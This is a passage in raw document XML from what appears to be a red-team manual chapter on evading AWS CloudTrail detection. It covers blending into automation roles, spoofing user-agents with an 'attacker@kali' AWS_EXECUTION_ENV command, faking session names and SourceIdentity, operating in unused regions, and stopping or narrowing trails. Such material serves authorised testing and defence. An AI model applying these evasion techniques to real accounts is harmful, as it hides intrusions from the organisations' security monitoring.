    <w:p w14:paraId="75E8D2A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Most AWS environments execute far more API calls per day from automation identities (CI roles, Terraform roles, scheduler Lambdas) than from human identities. That ratio is the operator's friend. If you are acting from a role whose CloudTrail baseline is thousands of calls per day across dozens of services, your additional calls are a rounding error. If you are acting from a human user that logs in once a week and runs four API calls, your presence is visible in absolute terms even before any anomaly model </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>runs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE5502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first evasion posture is therefore </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>act from roles, not users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, and among roles, pick the ones with the broadest normal behaviour. Terraform roles, deploy roles, and data-platform service roles are the archetypes. A good operator spends the time to read the role's recent usage — in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CloudTrail Insights</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Access Analyzer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, in the role's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>LastUsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> fields in IAM — and matches their activity to the role's existing footprint, not just in volume but also in region and service mix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4147D5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>16.2  User-agent and source-IP controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326D718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Every CloudTrail record includes the user-agent string and the source IP of the API caller. These two fields are often filtered in defensive queries: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">human calls come from the office ranges and use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-cli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a web browser; automation calls come from known CI ranges and use specific SDKs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. An operator should ensure their calls match the expected pattern. The most common mistakes are (a) using the default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-cli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> from an attacker workstation when the role's normal caller is a container using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-sdk-go-v2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> from an AWS IP, and (b) using a home IP when the role's normal caller is an Azure-hosted CI runner. The AWS SDKs allow setting the user-agent via environment variable (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS_EXECUTION_ENV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>); most operators forget this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA7FB0A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1961493374"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># match a Terraform-like user-agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665689AB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1961493374"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> AWS_EXECUTION_ENV=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"APN/1.0 HashiCorp/1.0 Terraform/1.5.7"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EC5990" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1961493374"/>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sts get-caller-identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2634A721" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1961493374"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Account"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"111122223333"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Arn"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"arn:aws:sts::111122223333:assumed-role/terraform-deploy/op-12345"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFC713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Source-IP control is harder. One operational pattern is to pivot calls through a compromised EC2 instance inside the target account (so the source IP is an AWS-internal address) or through a VPC endpoint (so the call never leaves the private network). Both are bandwidth-constrained and latency-heavy but they are the most realistic way to match an automation role's IP pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8FDE64" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>16.3  Session names and SourceIdentity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2953578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When you assume a role, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>RoleSessionName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is attacker-controlled and appears in CloudTrail's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>userIdentity.arn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> field as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>assumed-role/&lt;role&gt;/&lt;session-name&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. A session name of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ci-build-42117</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is invisible; a session name of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>pwned-session-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is self-reporting. More advanced: some roles are configured with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:SourceIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> conditions on their trust policies, which propagate a caller-asserted identity through chained </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> calls. Setting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SourceIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a value that matches the organization's build system identity pattern (for example, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>github-actions/MyOrg/MyRepo/run-12345</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>) makes chain-wide attribution uniformly consistent with the legitimate caller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D51AE88" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>16.4  Regional arbitrage and log routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A1851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CloudTrail can be regional or multi-region. Most organizations configure a multi-region trail in a central region; the rest have single-region trails per region. If the organization has not enabled a region, CloudTrail there records </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>only</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> global service events (IAM, STS) and not regional events. An attacker who operates only in an unused region — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>me-central-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ap-southeast-3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>af-south-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — may still produce a CloudTrail entry (because the global trail catches STS) but will not produce regional data events, S3 data events, or Lambda data events for that region. For short-lived operations in obscure regions, this is real reduction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7C0D49" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>16.5  Narrowing the log with unlogged actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E16975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small but operationally useful set of AWS API calls are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> logged in CloudTrail by default. STS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>GetCallerIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> used to be unlogged for principals with no temporary credentials; as of March 2024 it is logged in all cases. S3 list calls against a bucket are management events and are logged; S3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>GetObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a data event and is logged only if data-event logging is enabled on the trail. KMS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Decrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Encrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>GenerateDataKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>are logged as management events but are so numerous in a normal account that they are rarely alerted on. DynamoDB item-level API calls are data events, off by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B9AFB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attacker's move is to prefer, when available, actions that land in the data-event bucket rather than the management-event bucket, because data events are much more likely to be unlogged in a given organization. For example, reading a secret via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>secretsmanager:GetSecretValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a management event; reading the same secret's contents after </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>-ing to a role that already has it in an environment variable produces no management event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3596CCBC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>16.6  Disabling and diverting CloudTrail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7539064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There are three classes of high-risk evasion: stopping the trail, redirecting the trail, and disabling downstream services (GuardDuty, Config, Security Hub).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B21A7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Stopping the trail.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cloudtrail:StopLogging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> halts the specified trail. Every mature detection pipeline alerts on this event loudly; GuardDuty generates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Stealth:IAMUser/CloudTrailLoggingDisabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>; Config has a managed rule for it. Do not do this on an engagement whose goal is to persist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF522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Redirecting the trail.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cloudtrail:PutEventSelectors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> can narrow which management events are captured; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
